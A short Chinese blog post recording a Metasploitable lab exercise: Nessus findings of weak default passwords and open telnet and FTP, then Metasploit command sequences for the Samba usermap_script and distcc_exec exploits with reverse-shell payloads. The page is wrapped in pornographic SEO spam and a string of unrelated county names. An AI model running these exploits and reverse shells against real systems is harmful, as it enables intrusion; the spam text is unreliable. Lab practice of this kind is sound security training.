91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Samba&distcc 漏洞

發布時間:2020-05-27 16:57:09 來源:網絡 閱讀:1040 作者:GeForever 欄目:安全技術

漏洞測試確實是可以的  當時把文章copy下來進行再進行測試。但是沒有copy到圖片,實驗是成功了,但是沒有那么直觀。

使用metasploit

對metasploitable 靶服務器進行***

metasploitable 是ubuntu8.0的版本

 

neuss掃描到漏洞

139端口可以獲取該系統主機名為“METASPLOITABLE”,注釋“metasploitable server (Samba 3.0.20-Debian)”;

系統存在弱口令,用戶user、msfadmin密碼與用戶名一樣,使用net use命令能夠建立連接查看共享資源。ftp開放版本信息 ProFTPD 1.3.1 Server (Debian),user這個用戶在ftp中也可以使用;

telnet服務開放,可確定該系統為Ubuntu 8.04,用戶user、msfadmin可以登錄,并獲得相應權限。如果不存在弱口令,通過截獲該telnet數據也能獲取用戶口令

一個distcc漏洞

一個samba 共享服務漏洞

 

 

msf對靶服務器的工具

smb-samba 共享服務

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 但是沒有root的權限

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

西充县| 桃江县| 慈利县| 科技| 西畴县| 福州市| 土默特右旗| 榆中县| 甘肃省| 铁力市| 安西县| 金华市| 城市| 交城县| 武鸣县| 泾阳县| 张家口市| 翁源县| 酒泉市| 两当县| 且末县| 玛曲县| 阜平县| 阿拉善右旗| 临桂县| 册亨县| 罗田县| 华安县| 静乐县| 阿鲁科尔沁旗| 甘南县| 罗甸县| 湟中县| 方正县| 阳东县| 宿松县| 长顺县| 新建县| 金寨县| 宜城市| 岫岩|